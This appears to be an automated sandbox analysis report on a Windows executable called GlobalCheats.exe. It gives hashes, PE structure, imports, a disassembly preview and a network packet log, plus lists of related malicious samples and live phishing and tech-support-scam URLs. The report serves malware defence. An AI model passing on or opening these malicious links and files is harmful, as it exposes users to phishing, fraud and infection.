CLOUDFLARENETUS	mYbZPSIHzK.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.12.205
	https://jjhhgywddcdxxsccsss.z13.web.core.windows.net/index.html?ph0n=1-833-519-6284	Get hash	malicious	TechSupportScam	Browse	188.114.97.3
	https://smbcontract-my.sharepoint.com/:o:/p/shannon/EugDsMyyY6ZGu7GvKYh9_WEBAhkE0eSu6HHwrfB30WmIpw?e=5%3ahhWGVd&at=9	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Precision Pavement Markings ref_[00400649138752].eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.baidu.com/link?url=AFUg5ImByRbRDFqEAwVY_yQvqKKQI0Z9CKlSAojfE3k4FpO2skeOBycThw4wTQJI&wd=YWdyZWdvaXJlQGNvbW11bml0eWZvY3VzZmN1Lm9yZw==&eqid=ukEwxUaNVofiahyjoYydlLeVsGpoQBLJyZiHAGvxPtreMNMzHg	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://peninsularesentmentcarla.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	ELECTRONIC RECEIPT_bpost.be.html	Get hash	malicious	HTMLPhisher	Browse	172.64.151.101
	https://docs.google.com/presentation/d/e/2PACX-1vRYbMkTCdAD4bfobayIlXW76wTFBN4nWd4VouyUpsR4zHA8ZL7Rzj6q3eNAMwf423gIIKOZQDRhn46n/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://searchweb-blue.com	Get hash	malicious	Unknown	Browse	104.21.86.171
	Halkbank_Ekstre_2024061918_088957_785452.xlxs.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Other.Malware-gen.158.29963.xlsx	Get hash	malicious	Unknown	Browse	104.21.90.18
	4Ip0IVHqJ3.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.90.18
	vbihkhftm.exe	Get hash	malicious	LummaC	Browse	104.21.90.18
	clicker.exe	Get hash	malicious	LummaC	Browse	104.21.90.18
	xwfY3Mr0id.doc	Get hash	malicious	Unknown	Browse	104.21.90.18
	vcb_#20240618000.xls	Get hash	malicious	Unknown	Browse	104.21.90.18
	62c.js	Get hash	malicious	Unknown	Browse	104.21.90.18
	62c.js	Get hash	malicious	Unknown	Browse	104.21.90.18
	Set-up.exe	Get hash	malicious	Amadey, Vidar, Xmrig	Browse	104.21.90.18
	d5a.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.21.90.18

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.214023679374701
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	GlobalCheats.exe
File size:	87'635'968 bytes
MD5:	0786d76cbbf390b342c5b65f14a23530
SHA1:	2a758729935989e6f7c6cdd1ef3dbca7b2186e4d
SHA256:	4568c8c79b9a6fa899b07886d540c9a3e2afb124ab4ca1520eb8baea1a2dffc9
SHA512:	97433cd1c2606478b8cc13a2393dac3078d2224c79a79839ff96f8d0fba509b967ae2b0ee00c3a47e19a451288868f6783dcfbe7b74865a88bc05b3d253eaab6
SSDEEP:	393216:Tmej3wbi7lr7zAyuo8YSTS1JnB3Zdp1uPGiSPWw1JR8Z7cohuuasgsERf:Tz3wu7l9uo8BTUVfp1uVS+w1rcha7f
TLSH:	CE184B03B85105EBC5ACD936C63286537A31BD9D5B3467C72FA0B3286F72BD0AA79350
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.....49................@.............................pH.....zK9...`... ............................

File Icon


Icon Hash:	b271e08ed4f03368

Static PE Info

General

Entrypoint:	0x1400014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x41dc0790, 0x1, 0x41dc0760, 0x1, 0x41dc4290, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	a14391426c9a7e2306439092fb89c14e

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [051A84C5h]
mov dword ptr [eax], 00000001h
call 00007FF2E088AFBFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [051A84A5h]
mov dword ptr [eax], 00000000h
call 00007FF2E088AF9Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007FF2E2655484h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007FF2E088B2D9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp dword ptr [eax]
inc edi
outsd
and byte ptr [edx+75h], ah
imul ebp, dword ptr [esp+20h], 203A4449h
and dh, byte ptr [edx+58h]
jno 00007FF2E088B332h
xor dh, byte ptr [edx+36h]
dec esi
jo 00007FF2E088B36Bh
xor dword ptr [ebp+61h], esi
inc edi
xor dword ptr [eax], edi
xor al, 50h
dec edi
das
inc edx
jne 00007FF2E088B333h
xor ecx, dword ptr [ebp+esi+75h]
xor dword ptr [ecx], edi
dec eax
dec ebp
inc edi
inc ebp
push ecx
inc edx
inc edx
inc ecx
dec ecx
push esp
das
push ebx
arpl word ptr [eax+68h], bp
xor dword ptr [ecx+edi*2+58h], ecx
dec ecx
pop edi
push eax
dec ecx
imul ebx, dword ptr [edx+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5374000	0x282	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5375000	0x27c8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x537a000	0xd96c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x51ab000	0xd6ae8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5388000	0xfe57c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x51a9000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5375914	0x888	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1dcb0d0	0x1dcb200	3b75df37b31b543ebd00d7b52d78c93b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1dcd000	0xcbf110	0xcbf200	e7cf97e08e78f8202432ebd7ab0161b0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2a8d000	0x271d6e0	0x271d800	0432add8615e5a08cb6861d84ae38e51	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x51ab000	0xd6ae8	0xd6c00	268bf1a04bea2be62c242d28364b7002	False	0.38369925058207216	data	6.1562058528731445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x5282000	0x5b94	0x5c00	fc83121310bd289809168eb8b1769b73	False	0.11905570652173914	data	3.1973136286724717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x5288000	0xeb2e0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x5374000	0x282	0x400	b0665fb8575462e15a830f363f75356f	False	0.4013671875	data	4.12480493552791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x5375000	0x27c8	0x2800	8b81c4700e3e441a15f27c3f5b3c5f88	False	0.30283203125	PGP symmetric key encrypted data -	4.837267003049427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5378000	0x70	0x200	4ee95e93a8eaeb0dfc9db8494aedf3f2	False	0.083984375	data	0.4746201770558708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5379000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x537a000	0xd96c	0xda00	e9a2fa80df6c0a693a47637632541d43	False	0.4216958142201835	data	5.106691774262309	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5388000	0xfe57c	0xfe600	73d1bdfa8808910811442a7873e58942	False	0.08254280558968059	data	5.441693772636917	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x537a340	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640			0.41263440860215056
RT_ICON	0x537a628	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192			0.46621621621621623
RT_ICON	0x537a750	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688			0.6295309168443497
RT_ICON	0x537b5f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152			0.6687725631768953
RT_ICON	0x537bea0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.6647398843930635
RT_ICON	0x537c408	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896			0.4057628719886632
RT_ICON	0x5380630	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.42655601659751036
RT_ICON	0x5382bd8	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720			0.4316568047337278
RT_ICON	0x5384640	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.4554409005628518
RT_ICON	0x53856e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.4745901639344262
RT_ICON	0x5386070	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680			0.5
RT_ICON	0x5386728	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.5398936170212766
RT_GROUP_ICON	0x5386b90	0xae	data			0.6494252873563219
RT_VERSION	0x5386c40	0x584	data	English	United States	0.306657223796034
RT_MANIFEST	0x53871c4	0x7a8	XML 1.0 document, ASCII text, with very long lines (391), with CRLF line terminators	English	United States	0.3464285714285714

Imports

DLL	Import
GDI32.dll	ChoosePixelFormat, CreateBitmap, CreateDCW, CreateDIBSection, CreateRectRgn, DeleteDC, DeleteObject, DescribePixelFormat, GetDeviceCaps, GetDeviceGammaRamp, SetDeviceGammaRamp, SetPixelFormat, SwapBuffers
KERNEL32.dll	AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetModuleHandleExW, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadExecutionState, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VerSetConditionMask, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
msvcrt.dll	___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, _wassert, abort, calloc, exit, fprintf, fputc, free, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, qsort, realloc, signal, strcmp, strcpy, strcspn, strerror, strlen, strncmp, strncpy, strspn, strstr, strtok, strtol, strtoul, tolower, ungetc, vfprintf, wcscmp, wcscpy, wcslen
OPENGL32.dll	wglGetProcAddress
SHELL32.dll	DragAcceptFiles, DragFinish, DragQueryFileW, DragQueryPoint
USER32.dll	AdjustWindowRectEx, BringWindowToTop, ChangeDisplaySettingsExW, ClientToScreen, ClipCursor, CloseClipboard, CreateIconIndirect, CreateWindowExW, DefWindowProcW, DestroyIcon, DestroyWindow, DispatchMessageW, EmptyClipboard, EnumDisplayDevicesW, EnumDisplayMonitors, EnumDisplaySettingsExW, EnumDisplaySettingsW, FlashWindow, GetActiveWindow, GetClassLongPtrW, GetClientRect, GetClipboardData, GetCursorPos, GetDC, GetKeyState, GetLayeredWindowAttributes, GetMessageTime, GetMonitorInfoW, GetPropW, GetRawInputData, GetRawInputDeviceInfoA, GetRawInputDeviceList, GetSystemMetrics, GetWindowLongW, GetWindowPlacement, GetWindowRect, IsIconic, IsWindowVisible, IsZoomed, LoadCursorW, LoadImageW, MapVirtualKeyW, MonitorFromWindow, MoveWindow, MsgWaitForMultipleObjects, OffsetRect, OpenClipboard, PeekMessageW, PostMessageW, PtInRect, RegisterClassExW, RegisterDeviceNotificationW, RegisterRawInputDevices, ReleaseCapture, ReleaseDC, RemovePropW, ScreenToClient, SendMessageW, SetCapture, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetLayeredWindowAttributes, SetPropW, SetRect, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextW, ShowWindow, SystemParametersInfoW, ToUnicode, TrackMouseEvent, TranslateMessage, UnregisterClassW, UnregisterDeviceNotification, WaitMessage, WindowFromPoint

Exports

Name	Ordinal	Address
_cgo_dummy_export	1	0x14536f8d0
glowDebugCallback_glcore32	2	0x141da70d0
glowDebugCallback_glcore46	3	0x141d84ae0
goCharCB	4	0x141d91a20
goCharModsCB	5	0x141d91a70
goCursorEnterCB	6	0x141d918f0
goCursorPosCB	7	0x141d91880
goDropCB	8	0x141d91ad0
goErrorCB	9	0x141d91770
goFramebufferSizeCB	10	0x141d91c50
goJoystickCB	11	0x141d917d0
goKeyCB	12	0x141d919b0
goMonitorCB	13	0x141d91b40
goMouseButtonCB	14	0x141d91820
goScrollCB	15	0x141d91940
goWindowCloseCB	16	0x141d91cb0
goWindowContentScaleCB	17	0x141d91e40
goWindowFocusCB	18	0x141d91da0
goWindowIconifyCB	19	0x141d91df0
goWindowMaximizeCB	20	0x141d91d00
goWindowPosCB	21	0x141d91b90
goWindowRefreshCB	22	0x141d91d50
goWindowSizeCB	23	0x141d91bf0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2024 22:59:38.064121008 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.064152956 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:38.064222097 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.065540075 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.065560102 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:38.563544989 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:38.563610077 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.568775892 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.568799973 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:38.569173098 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:38.615479946 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.624973059 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.624994040 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:38.625185966 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.014883995 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.015142918 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.015291929 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.051980019 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.051980019 CEST	62538	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.052004099 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.052015066 CEST	443	62538	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.061261892 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.061353922 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.061431885 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.062506914 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.062556028 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.553812027 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.553924084 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.569528103 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.569638968 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.570606947 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:39.571813107 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.571813107 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:39.572087049 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.226793051 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.226861000 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227013111 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227057934 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.227137089 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227202892 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.227615118 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227648973 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227818012 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227832079 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.227910042 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.227962017 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.228247881 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.229876995 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.229897022 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.231817007 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.231853962 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.231921911 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.231940031 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.232007027 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.315606117 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.316132069 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.316174984 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.316302061 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.316397905 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.316397905 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.316806078 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.316849947 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.316879034 CEST	62539	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.316895008 CEST	443	62539	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.489413023 CEST	62540	443	192.168.2.4	104.21.90.18
